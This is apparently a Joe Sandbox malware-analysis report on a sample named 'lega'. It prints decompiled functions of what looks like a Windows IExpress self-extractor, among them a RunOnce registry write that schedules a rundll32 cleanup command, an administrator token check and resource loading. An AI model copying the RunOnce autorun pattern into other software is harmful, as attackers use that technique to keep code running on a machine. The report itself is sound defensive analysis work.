Associated: 00000002.00000002.378508998.0000000000AC0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378527805.0000000000AC8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378536959.0000000000ACA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378536959.0000000000ACC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_will3629.jbxd

Similarity

API ID: AddressLibraryProc$CharFreePrev$LoadPathTemp
String ID: SHBrowseForFolder$SHELL32.DLL$SHGetPathFromIDList
API String ID: 1865808269-1731843650
Opcode ID: fd4bdf7a4b2ad4e1a3efc8ca98b1f842582a136c7484f6d2bd4ecee97d669b3d
Instruction ID: 4cb8734feb4861e320f3d97338addeb863c851808a44edd220527399c2dbd9c5
Opcode Fuzzy Hash: fd4bdf7a4b2ad4e1a3efc8ca98b1f842582a136c7484f6d2bd4ecee97d669b3d
Instruction Fuzzy Hash: AC41E375A00244AFD7119BA0DCA9FBE7BB4FB49384F07056DE941A7351CB788C028765

Uniqueness

Uniqueness Score: -1.00%

Function 00AC2773 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 114
registryCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E00AC2773(CHAR* __ecx, char* _a4) {
				signed int _v8;
				char _v268;
				char _v269;
				CHAR* _v276;
				int _v280;
				void* _v284;
				int _v288;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t23;
				intOrPtr _t34;
				int _t45;
				int* _t50;
				CHAR* _t52;
				CHAR* _t61;
				char* _t62;
				int _t63;
				CHAR* _t64;
				signed int _t65;

				_t52 = __ecx;
				_t23 =  *0xac8004; // 0xc32e3ded
				_v8 = _t23 ^ _t65;
				_t62 = _a4;
				_t50 = 0;
				_t61 = __ecx;
				_v276 = _t62;
				 *((char*)(__ecx)) = 0;
				if( *_t62 != 0x23) {
					_t63 = 0x104;
					goto L14;
				} else {
					_t64 = _t62 + 1;
					_v269 = CharUpperA( *_t64);
					_v276 = CharNextA(CharNextA(_t64));
					_t63 = 0x104;
					_t34 = _v269;
					if(_t34 == 0x53) {
						L14:
						GetSystemDirectoryA(_t61, _t63);
						goto L15;
					} else {
						if(_t34 == 0x57) {
							GetWindowsDirectoryA(_t61, 0x104);
							goto L16;
						} else {
							_push(_t52);
							_v288 = 0x104;
							E00AC1781( &_v268, 0x104, _t52, "Software\\Microsoft\\Windows\\CurrentVersion\\App Paths");
							_t59 = 0x104;
							E00AC658A( &_v268, 0x104, _v276);
							if(RegOpenKeyExA(0x80000002,  &_v268, 0, 0x20019,  &_v284) != 0) {
								L16:
								_t59 = _t63;
								E00AC658A(_t61, _t63, _v276);
							} else {
								if(RegQueryValueExA(_v284, 0xac1140, 0,  &_v280, _t61,  &_v288) == 0) {
									_t45 = _v280;
									if(_t45 != 2) {
										L9:
										if(_t45 == 1) {
											goto L10;
										}
									} else {
										if(ExpandEnvironmentStringsA(_t61,  &_v268, 0x104) == 0) {
											_t45 = _v280;
											goto L9;
										} else {
											_t59 = 0x104;
											E00AC1680(_t61, 0x104,  &_v268);
											L10:
											_t50 = 1;
										}
									}
								}
								RegCloseKey(_v284);
								L15:
								if(_t50 == 0) {
									goto L16;
								}
							}
						}
					}
				}
				return E00AC6CE0(1, _t50, _v8 ^ _t65, _t59, _t61, _t63);
			}

0x00ac2773
0x00ac277e
0x00ac2785
0x00ac278a
0x00ac278d
0x00ac2790
0x00ac2792
0x00ac2798
0x00ac279d
0x00ac28b2
0x00000000
0x00ac27a3
0x00ac27a3
0x00ac27af
0x00ac27c2
0x00ac27c8
0x00ac27cd
0x00ac27d5
0x00ac28b7
0x00ac28b9
0x00000000
0x00ac27db
0x00ac27dd
0x00ac28aa
0x00000000
0x00ac27e3
0x00ac27e3
0x00ac27ec
0x00ac27f8
0x00ac2803
0x00ac280b
0x00ac2831
0x00ac28c3
0x00ac28c9
0x00ac28cd
0x00ac2837
0x00ac285a
0x00ac285c
0x00ac2865
0x00ac2892
0x00ac2895
0x00000000
0x00000000
0x00ac2867
0x00ac2878
0x00ac288c
0x00000000
0x00ac287a
0x00ac2880
0x00ac2885
0x00ac2897
0x00ac2899
0x00ac2899
0x00ac2878
0x00ac2865
0x00ac28a0
0x00ac28bf
0x00ac28c1
0x00000000
0x00000000
0x00ac28c1
0x00ac2831
0x00ac27dd
0x00ac27d5
0x00ac28e5

APIs

CharUpperA.USER32(C32E3DED,00000000,00000000,00000000), ref: 00AC27A8
CharNextA.USER32(0000054D), ref: 00AC27B5
CharNextA.USER32(00000000), ref: 00AC27BC
RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00AC2829
RegQueryValueExA.ADVAPI32(?,00AC1140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00AC2852
ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00AC2870
RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00AC28A0
GetWindowsDirectoryA.KERNEL32(-00000005,00000104), ref: 00AC28AA
GetSystemDirectoryA.KERNEL32 ref: 00AC28B9

Strings

Software\Microsoft\Windows\CurrentVersion\App Paths, xrefs: 00AC27E4

Memory Dump Source

Source File: 00000002.00000002.378516850.0000000000AC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AC0000, based on PE: true

Associated: 00000002.00000002.378508998.0000000000AC0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378527805.0000000000AC8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378536959.0000000000ACA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378536959.0000000000ACC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_will3629.jbxd

Similarity

API ID: Char$DirectoryNext$CloseEnvironmentExpandOpenQueryStringsSystemUpperValueWindows
String ID: Software\Microsoft\Windows\CurrentVersion\App Paths
API String ID: 2659952014-2428544900
Opcode ID: 12017c1698dfd6f57188d12e8dc39a40b2ed38717500c49e852b6bc14db4f811
Instruction ID: 58c84ac022ee1bb85c894f776b010617c7f226b57c166220b5d55640ed563a15
Opcode Fuzzy Hash: 12017c1698dfd6f57188d12e8dc39a40b2ed38717500c49e852b6bc14db4f811
Instruction Fuzzy Hash: EC41A071A0012CAFDB24DB649C85FFA7BBDEB65700F0640ADF549E2101DB708E868FA1

Uniqueness

Uniqueness Score: -1.00%

Function 00AC2267 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 88
registryCOMMON

Download Yara Rule

C-Code - Quality: 62%

			E00AC2267() {
				signed int _v8;
				char _v268;
				char _v836;
				void* _v840;
				int _v844;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t19;
				intOrPtr _t33;
				void* _t38;
				intOrPtr* _t42;
				void* _t45;
				void* _t47;
				void* _t49;
				signed int _t51;

				_t19 =  *0xac8004; // 0xc32e3ded
				_t20 = _t19 ^ _t51;
				_v8 = _t19 ^ _t51;
				if( *0xac8530 != 0) {
					_push(_t49);
					if(RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x2001f,  &_v840) == 0) {
						_push(_t38);
						_v844 = 0x238;
						if(RegQueryValueExA(_v840, ?str?, 0, 0,  &_v836,  &_v844) == 0) {
							_push(_t47);
							memset( &_v268, 0, 0x104);
							if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
								E00AC658A( &_v268, 0x104, 0xac1140);
							}
							_push("C:\Users\alfons\AppData\Local\Temp\IXP002.TMP\");
							E00AC171E( &_v836, 0x238, "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"",  &_v268);
							_t42 =  &_v836;
							_t45 = _t42 + 1;
							_pop(_t47);
							do {
								_t33 =  *_t42;
								_t42 = _t42 + 1;
							} while (_t33 != 0);
							RegSetValueExA(_v840, "wextract_cleanup2", 0, 1,  &_v836, _t42 - _t45 + 1);
						}
						_t20 = RegCloseKey(_v840);
						_pop(_t38);
					}
					_pop(_t49);
				}
				return E00AC6CE0(_t20, _t38, _v8 ^ _t51, _t45, _t47, _t49);
			}

0x00ac2272
0x00ac2277
0x00ac2279
0x00ac2283
0x00ac2289
0x00ac22ab
0x00ac22b1
0x00ac22c4
0x00ac22e0
0x00ac22e6
0x00ac22f5
0x00ac230d
0x00ac231c
0x00ac231c
0x00ac2321
0x00ac233a
0x00ac2342
0x00ac2348
0x00ac234b
0x00ac234c
0x00ac234c
0x00ac234e
0x00ac234f
0x00ac236e
0x00ac236e
0x00ac237a
0x00ac2380
0x00ac2380
0x00ac2381
0x00ac2381
0x00ac238f

APIs

RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,0002001F,?,00000001), ref: 00AC22A3
RegQueryValueExA.ADVAPI32(?,wextract_cleanup2,00000000,00000000,?,?,00000001), ref: 00AC22D8
memset.MSVCRT ref: 00AC22F5
GetSystemDirectoryA.KERNEL32 ref: 00AC2305
RegSetValueExA.ADVAPI32(?,wextract_cleanup2,00000000,00000001,?,?,?,?,?,?,?,?,?), ref: 00AC236E
RegCloseKey.ADVAPI32(?), ref: 00AC237A

Strings

wextract_cleanup2, xrefs: 00AC227C, 00AC22CD, 00AC2363
rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s", xrefs: 00AC232D
C:\Users\user\AppData\Local\Temp\IXP002.TMP\, xrefs: 00AC2321
Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 00AC2299

Memory Dump Source

Source File: 00000002.00000002.378516850.0000000000AC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AC0000, based on PE: true

Associated: 00000002.00000002.378508998.0000000000AC0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378527805.0000000000AC8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378536959.0000000000ACA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378536959.0000000000ACC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_will3629.jbxd

Similarity

API ID: Value$CloseDirectoryOpenQuerySystemmemset
String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\$Software\Microsoft\Windows\CurrentVersion\RunOnce$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup2
API String ID: 3027380567-3029760535
Opcode ID: 6df449cc12e3839dfde420eb74999ec4ab355823f00f85ed156b94ebd75742a0
Instruction ID: 019eb7a1a91fdbd93ad0e7508b8aae06a8718b072ffddc46cf72e1ef0999182f
Opcode Fuzzy Hash: 6df449cc12e3839dfde420eb74999ec4ab355823f00f85ed156b94ebd75742a0
Instruction Fuzzy Hash: 3431E171A0021CBBCB21DB64DC49FEBBB7CFB54740F0601ADB50DAA041EA74AB89CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00AC3100 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 70
windowCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E00AC3100(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
				void* _t8;
				void* _t11;
				void* _t15;
				struct HWND__* _t16;
				struct HWND__* _t33;
				struct HWND__* _t34;

				_t8 = _a8 - 0xf;
				if(_t8 == 0) {
					if( *0xac8590 == 0) {
						SendDlgItemMessageA(_a4, 0x834, 0xb1, 0xffffffff, 0);
						 *0xac8590 = 1;
					}
					L13:
					return 0;
				}
				_t11 = _t8 - 1;
				if(_t11 == 0) {
					L7:
					_push(0);
					L8:
					EndDialog(_a4, ??);
					L9:
					return 1;
				}
				_t15 = _t11 - 0x100;
				if(_t15 == 0) {
					_t16 = GetDesktopWindow();
					_t33 = _a4;
					E00AC43D0(_t33, _t16);
					SetDlgItemTextA(_t33, 0x834,  *0xac8d4c);
					SetWindowTextA(_t33, "lega");
					SetForegroundWindow(_t33);
					_t34 = GetDlgItem(_t33, 0x834);
					 *0xac88b8 = GetWindowLongA(_t34, 0xfffffffc);
					SetWindowLongA(_t34, 0xfffffffc, E00AC30C0);
					return 1;
				}
				if(_t15 != 1) {
					goto L13;
				}
				if(_a12 != 6) {
					if(_a12 != 7) {
						goto L9;
					}
					goto L7;
				}
				_push(1);
				goto L8;
			}

0x00ac3108
0x00ac310b
0x00ac31b7
0x00ac31ca
0x00ac31d0
0x00ac31d0
0x00ac31da
0x00000000
0x00ac31da
0x00ac3111
0x00ac3114
0x00ac3136
0x00ac3136
0x00ac3138
0x00ac313b
0x00ac3141
0x00000000
0x00ac3143
0x00ac3116
0x00ac311b
0x00ac314b
0x00ac3151
0x00ac3158
0x00ac316a
0x00ac3176
0x00ac317d
0x00ac318b
0x00ac319e
0x00ac31a3
0x00000000
0x00ac31ad
0x00ac3120
0x00000000
0x00000000
0x00ac312a
0x00ac3134
0x00000000
0x00000000
0x00000000
0x00ac3134
0x00ac312c
0x00000000

APIs

EndDialog.USER32(?,00000000), ref: 00AC313B
GetDesktopWindow.USER32 ref: 00AC314B
SetDlgItemTextA.USER32(?,00000834), ref: 00AC316A
SetWindowTextA.USER32(?,lega), ref: 00AC3176
SetForegroundWindow.USER32(?), ref: 00AC317D
GetDlgItem.USER32(?,00000834), ref: 00AC3185
GetWindowLongA.USER32(00000000,000000FC), ref: 00AC3190
SetWindowLongA.USER32(00000000,000000FC,00AC30C0), ref: 00AC31A3
SendDlgItemMessageA.USER32(?,00000834,000000B1,000000FF,00000000), ref: 00AC31CA

Strings

lega, xrefs: 00AC3170

Memory Dump Source

Source File: 00000002.00000002.378516850.0000000000AC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AC0000, based on PE: true

Associated: 00000002.00000002.378508998.0000000000AC0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378527805.0000000000AC8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378536959.0000000000ACA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378536959.0000000000ACC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_will3629.jbxd

Similarity

API ID: Window$Item$LongText$DesktopDialogForegroundMessageSend
String ID: lega
API String ID: 3785188418-245445314
Opcode ID: 6de05b0f4ef8ab707b7b770d46e2b65fe77855905992b2247f6860cf63bb82a7
Instruction ID: 0b2894a9262e559836ffbb5ef0a5e36dfc200da8844c443c25dd8f9b8c9c51d8
Opcode Fuzzy Hash: 6de05b0f4ef8ab707b7b770d46e2b65fe77855905992b2247f6860cf63bb82a7
Instruction Fuzzy Hash: 2D110632204225BFDF11DFA4AC0CFAA3A64FB5A724F0B8718F815951E0DBB58A43D746

Uniqueness

Uniqueness Score: -1.00%

Function 00AC18A3 Relevance: 16.6, APIs: 11, Instructions: 112
memoryCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E00AC18A3(void* __edx, void* __esi) {
				signed int _v8;
				short _v12;
				struct _SID_IDENTIFIER_AUTHORITY _v16;
				char _v20;
				long _v24;
				void* _v28;
				void* _v32;
				void* __ebx;
				void* __edi;
				signed int _t23;
				long _t45;
				void* _t49;
				int _t50;
				void* _t52;
				signed int _t53;

				_t51 = __esi;
				_t49 = __edx;
				_t23 =  *0xac8004; // 0xc32e3ded
				_v8 = _t23 ^ _t53;
				_t25 =  *0xac8128; // 0x2
				_t45 = 0;
				_v12 = 0x500;
				_t50 = 2;
				_v16.Value = 0;
				_v20 = 0;
				if(_t25 != _t50) {
					L20:
					return E00AC6CE0(_t25, _t45, _v8 ^ _t53, _t49, _t50, _t51);
				}
				if(E00AC17EE( &_v20) != 0) {
					_t25 = _v20;
					if(_v20 != 0) {
						 *0xac8128 = 1;
					}
					goto L20;
				}
				if(OpenProcessToken(GetCurrentProcess(), 8,  &_v28) == 0) {
					goto L20;
				}
				if(GetTokenInformation(_v28, _t50, 0, 0,  &_v24) != 0 || GetLastError() != 0x7a) {
					L17:
					CloseHandle(_v28);
					_t25 = _v20;
					goto L20;
				} else {
					_push(__esi);
					_t52 = LocalAlloc(0, _v24);
					if(_t52 == 0) {
						L16:
						_pop(_t51);
						goto L17;
					}
					if(GetTokenInformation(_v28, _t50, _t52, _v24,  &_v24) == 0 || AllocateAndInitializeSid( &_v16, _t50, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v32) == 0) {
						L15:
						LocalFree(_t52);
						goto L16;
					} else {
						if( *_t52 <= 0) {
							L14:
							FreeSid(_v32);
							goto L15;
						}
						_t15 = _t52 + 4; // 0x4
						_t50 = _t15;
						while(EqualSid( *_t50, _v32) == 0) {
							_t45 = _t45 + 1;
							_t50 = _t50 + 8;
							if(_t45 <  *_t52) {
								continue;
							}
							goto L14;
						}
						 *0xac8128 = 1;
						_v20 = 1;
						goto L14;
					}
				}
			}

0x00ac18a3
0x00ac18a3
0x00ac18ab
0x00ac18b2
0x00ac18b5
0x00ac18be
0x00ac18c0
0x00ac18c6
0x00ac18c7
0x00ac18ca
0x00ac18cf
0x00ac19c9
0x00ac19d8
0x00ac19d8
0x00ac18df
0x00ac19b8
0x00ac19bd
0x00ac19bf
0x00ac19bf
0x00000000
0x00ac19bd
0x00ac18fa
0x00000000
0x00000000
0x00ac1912
0x00ac19aa
0x00ac19ad
0x00ac19b3
0x00000000
0x00ac1927
0x00ac1927
0x00ac1932
0x00ac1936
0x00ac19a9
0x00ac19a9
0x00000000
0x00ac19a9
0x00ac194c
0x00ac19a2
0x00ac19a3
0x00000000
0x00ac196e
0x00ac1970
0x00ac1999
0x00ac199c
0x00000000
0x00ac199c
0x00ac1972
0x00ac1972
0x00ac1975
0x00ac1984
0x00ac1985
0x00ac198a
0x00000000
0x00000000
0x00000000
0x00ac198c
0x00ac1991
0x00ac1996
0x00000000
0x00ac1996
0x00ac194c

APIs

Part of subcall function 00AC17EE: LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,00AC18DD), ref: 00AC181A
Part of subcall function 00AC17EE: GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 00AC182C
Part of subcall function 00AC17EE: AllocateAndInitializeSid.ADVAPI32(00AC18DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,00AC18DD), ref: 00AC1855
Part of subcall function 00AC17EE: FreeSid.ADVAPI32(?,?,?,?,00AC18DD), ref: 00AC1883
Part of subcall function 00AC17EE: FreeLibrary.KERNEL32(00000000,?,?,?,00AC18DD), ref: 00AC188A

GetCurrentProcess.KERNEL32(00000008,?,00000000,00000001), ref: 00AC18EB
OpenProcessToken.ADVAPI32(00000000), ref: 00AC18F2
GetTokenInformation.ADVAPI32(?,00000002,00000000,00000000,?), ref: 00AC190A
GetLastError.KERNEL32 ref: 00AC1918
LocalAlloc.KERNEL32(00000000,?,?), ref: 00AC192C
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?), ref: 00AC1944
AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00AC1964
EqualSid.ADVAPI32(00000004,?), ref: 00AC197A
FreeSid.ADVAPI32(?), ref: 00AC199C
LocalFree.KERNEL32(00000000), ref: 00AC19A3
CloseHandle.KERNEL32(?), ref: 00AC19AD

Memory Dump Source

Source File: 00000002.00000002.378516850.0000000000AC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AC0000, based on PE: true

Associated: 00000002.00000002.378508998.0000000000AC0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378527805.0000000000AC8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378536959.0000000000ACA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378536959.0000000000ACC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_will3629.jbxd

Similarity

API ID: Free$Token$AllocateInformationInitializeLibraryLocalProcess$AddressAllocCloseCurrentEqualErrorHandleLastLoadOpenProc
String ID:
API String ID: 2168512254-0
Opcode ID: 9def0377b14b0a0fb6fff235680b501469a2ed76523e837ab9ce522b2b20ae85
Instruction ID: 95a075f12a10dad26ced824fc0a8830d35776cb32a64f1105890cf88a3e49e2a
Opcode Fuzzy Hash: 9def0377b14b0a0fb6fff235680b501469a2ed76523e837ab9ce522b2b20ae85
Instruction Fuzzy Hash: 23313971A00209AFDB20DFE5DC98EBFBBB8FF15344F120429E646E2151DB309906CB62

Uniqueness

Uniqueness Score: -1.00%

Function 00AC468F Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E00AC468F(CHAR* __ecx, void* __edx, intOrPtr _a4) {
				long _t4;
				void* _t11;
				CHAR* _t14;
				void* _t15;
				long _t16;

				_t14 = __ecx;
				_t11 = __edx;
				_t4 = SizeofResource(0, FindResourceA(0, __ecx, 0xa));
				_t16 = _t4;
				if(_t16 <= _a4 && _t11 != 0) {
					if(_t16 == 0) {
						L5:
						return 0;
					}
					_t15 = LockResource(LoadResource(0, FindResourceA(0, _t14, 0xa)));
					if(_t15 == 0) {
						goto L5;
					}
					__imp__memcpy_s(_t11, _a4, _t15, _t16);
					FreeResource(_t15);
					return _t16;
				}
				return _t4;
			}

0x00ac4699
0x00ac469b
0x00ac46a9
0x00ac46af
0x00ac46b4
0x00ac46bc
0x00ac46f9
0x00000000
0x00ac46f9
0x00ac46d9
0x00ac46dd
0x00000000
0x00000000
0x00ac46e5
0x00ac46ef
0x00000000
0x00ac46f5
0x00ac46ff

APIs

FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00AC46A0
SizeofResource.KERNEL32(00000000,00000000,?,00AC2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00AC46A9
FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00AC46C3
LoadResource.KERNEL32(00000000,00000000,?,00AC2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00AC46CC
LockResource.KERNEL32(00000000,?,00AC2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00AC46D3
memcpy_s.MSVCRT ref: 00AC46E5
FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00AC46EF

Strings

TITLE, xrefs: 00AC469D, 00AC46C0
lega, xrefs: 00AC46E4

Memory Dump Source

Source File: 00000002.00000002.378516850.0000000000AC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AC0000, based on PE: true

Associated: 00000002.00000002.378508998.0000000000AC0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378527805.0000000000AC8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378536959.0000000000ACA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378536959.0000000000ACC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_will3629.jbxd

Similarity

API ID: Resource$Find$FreeLoadLockSizeofmemcpy_s
String ID: TITLE$lega
API String ID: 3370778649-934471404
Opcode ID: caf3ef9b7aa408d9807bde19056ef7d868de8dd5a534eb9b07b0bd90887ccab6
Instruction ID: a132ae06d53640ad921a8cad65f9eb2ff389cd8a7b616ac560e946df73969acd
Opcode Fuzzy Hash: caf3ef9b7aa408d9807bde19056ef7d868de8dd5a534eb9b07b0bd90887ccab6
Instruction Fuzzy Hash: 6901A9362442147BF31057E56C4DF7B7E2CDBDAF95F060518FA4A97150C971884287BA

Uniqueness

Uniqueness Score: -1.00%

Function 00AC17EE Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 71
librarymemoryloaderCOMMON

Download Yara Rule

C-Code - Quality: 57%

			E00AC17EE(intOrPtr* __ecx) {
				signed int _v8;
				short _v12;
				struct _SID_IDENTIFIER_AUTHORITY _v16;
				_Unknown_base(*)()* _v20;
				void* _v24;
				intOrPtr* _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t14;
				_Unknown_base(*)()* _t20;
				long _t28;
				void* _t35;
				struct HINSTANCE__* _t36;
				signed int _t38;
				intOrPtr* _t39;

				_t14 =  *0xac8004; // 0xc32e3ded
				_v8 = _t14 ^ _t38;
				_v12 = 0x500;
				_t37 = __ecx;
				_v16.Value = 0;
				_v28 = __ecx;
				_t28 = 0;
				_t36 = LoadLibraryA("advapi32.dll");
				if(_t36 != 0) {
					_t20 = GetProcAddress(_t36, "CheckTokenMembership");
					_v20 = _t20;
					if(_t20 != 0) {
						 *_t37 = 0;
						_t28 = 1;
						if(AllocateAndInitializeSid( &_v16, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v24) != 0) {
							_t37 = _t39;
							 *0xaca288(0, _v24, _v28);
							_v20();
							if(_t39 != _t39) {
								asm("int 0x29");
							}
							FreeSid(_v24);
						}
					}
					FreeLibrary(_t36);
				}
				return E00AC6CE0(_t28, _t28, _v8 ^ _t38, _t35, _t36, _t37);
			}

0x00ac17f6
0x00ac17fd
0x00ac1805
0x00ac180b
0x00ac180d
0x00ac1815
0x00ac1818
0x00ac1820
0x00ac1824
0x00ac182c
0x00ac1832
0x00ac1837
0x00ac1851
0x00ac1854
0x00ac185d
0x00ac1862
0x00ac186c
0x00ac1872
0x00ac1877
0x00ac187e
0x00ac187e
0x00ac1883
0x00ac1883
0x00ac185d
0x00ac188a
0x00ac188a
0x00ac18a2

APIs

LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,00AC18DD), ref: 00AC181A
GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 00AC182C
AllocateAndInitializeSid.ADVAPI32(00AC18DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,00AC18DD), ref: 00AC1855
FreeSid.ADVAPI32(?,?,?,?,00AC18DD), ref: 00AC1883
FreeLibrary.KERNEL32(00000000,?,?,?,00AC18DD), ref: 00AC188A

Strings

advapi32.dll, xrefs: 00AC1810
CheckTokenMembership, xrefs: 00AC1826

Memory Dump Source

Source File: 00000002.00000002.378516850.0000000000AC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AC0000, based on PE: true

Associated: 00000002.00000002.378508998.0000000000AC0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378527805.0000000000AC8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378536959.0000000000ACA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378536959.0000000000ACC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_will3629.jbxd

Similarity

API ID: FreeLibrary$AddressAllocateInitializeLoadProc
String ID: CheckTokenMembership$advapi32.dll
API String ID: 4204503880-1888249752
Opcode ID: fae29b93feafb2e7f0e2af644945720d833261ea2de75bedcc47201f530c0444
Instruction ID: 6e73f2fc56473401942d536d73287aa0ca41393066cd13d0ed6de3670ab8e503
Opcode Fuzzy Hash: fae29b93feafb2e7f0e2af644945720d833261ea2de75bedcc47201f530c0444
Instruction Fuzzy Hash: 96118E71F00209ABDB10DFA4DC49FBEBBB8FB49745F12056DFA02E2291DA308D018B91

Uniqueness

Uniqueness Score: -1.00%

Function 00AC3450 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00AC3450(struct HWND__* _a4, intOrPtr _a8, int _a12) {
				void* _t7;
				void* _t11;
				struct HWND__* _t12;
				int _t22;
				struct HWND__* _t24;

				_t7 = _a8 - 0x10;
				if(_t7 == 0) {
					EndDialog(_a4, 2);
					L11:
					return 1;
				}
				_t11 = _t7 - 0x100;
				if(_t11 == 0) {
					_t12 = GetDesktopWindow();
					_t24 = _a4;
					E00AC43D0(_t24, _t12);
					SetWindowTextA(_t24, "lega");
					SetDlgItemTextA(_t24, 0x838,  *0xac9404);
					SetForegroundWindow(_t24);
					goto L11;
				}
				if(_t11 == 1) {
					_t22 = _a12;
					if(_t22 < 6) {
						goto L11;
					}
					if(_t22 <= 7) {
						L8:
						EndDialog(_a4, _t22);
						return 1;
					}
					if(_t22 != 0x839) {
						goto L11;
					}
					 *0xac91dc = 1;
					goto L8;
				}
				return 0;
			}

0x00ac3459
0x00ac345c
0x00ac34d8
0x00ac34de
0x00000000
0x00ac34e0
0x00ac345e
0x00ac3463
0x00ac349a
0x00ac34a0
0x00ac34a7
0x00ac34b2
0x00ac34c4
0x00ac34cb
0x00000000
0x00ac34cb
0x00ac3468
0x00ac346e
0x00ac3474
0x00000000
0x00000000
0x00ac347c
0x00ac348c
0x00ac3490
0x00000000
0x00ac3496
0x00ac3484
0x00000000
0x00000000
0x00ac3486
0x00000000
0x00ac3486
0x00000000

APIs

EndDialog.USER32(?,?), ref: 00AC3490
GetDesktopWindow.USER32 ref: 00AC349A
SetWindowTextA.USER32(?,lega), ref: 00AC34B2
SetDlgItemTextA.USER32(?,00000838), ref: 00AC34C4
SetForegroundWindow.USER32(?), ref: 00AC34CB
EndDialog.USER32(?,00000002), ref: 00AC34D8

Strings

